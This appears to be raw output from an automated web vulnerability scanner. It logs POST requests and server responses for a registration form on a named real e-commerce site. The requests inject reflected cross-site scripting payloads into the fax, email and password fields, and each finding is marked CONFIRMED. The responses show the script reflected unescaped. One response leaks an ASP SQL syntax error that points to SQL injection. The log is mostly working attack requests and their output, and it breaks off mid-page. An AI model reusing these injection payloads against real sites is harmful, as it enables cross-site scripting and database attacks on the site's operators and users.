Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 370
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=Other+Country&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0001F5)%3c%2fscript%3e&txtEmail=netsparker%40example.com&cmbAdvert=7

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:43:12 GMT
Content-Length: 12522
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country" selected>Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="'"--></style></script><script>netsparker(0x0001F5)</script>"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1">Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7" Selected></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST Other Country
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST '"--></style></script><script>alert(0x0001F6)</script>
cmbAdvert POST 7

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 347
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=Other+Country&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0001F6)%3c%2fscript%3e&cmbAdvert=7

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:43:15 GMT
Content-Length: 1413
Content-Type: text/html
Expires: Mon, 02 May 2011 03:43:15 GMT
Cache-control: private




<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}

-->
</style>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
There was an error. <br>If this continues, please call HLSM at: 570-719-9000 <br>ASP Description: Syntax error in string in query expression 'Field14 = ''"--></style></script><script>netsparker(0x0001F6)</script>''. <br>ASP File: /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp <br>ASP Line: 469 <br>ASP Number: -2147217900 <br>
<P>&nbsp;</P>

</BODY>
</HTML>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST '"--></style></script><script>alert(0x000227)</script>
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST DE
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 347
Accept-Encoding: gzip, deflate

Type=42&txtpassword='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000227)%3c%2fscript%3e&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=DE&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:49:16 GMT
Content-Length: 12074
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords do not match each other, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="'"--></style></script><script>netsparker(0x000227)</script>">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE" selected>DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST '"--></style></script><script>alert(0x000228)</script>
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST DE
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 347
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000228)%3c%2fscript%3e&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=DE&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:49:22 GMT
Content-Length: 12074
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords do not match each other, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="'"--></style></script><script>netsparker(0x000228)</script>">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
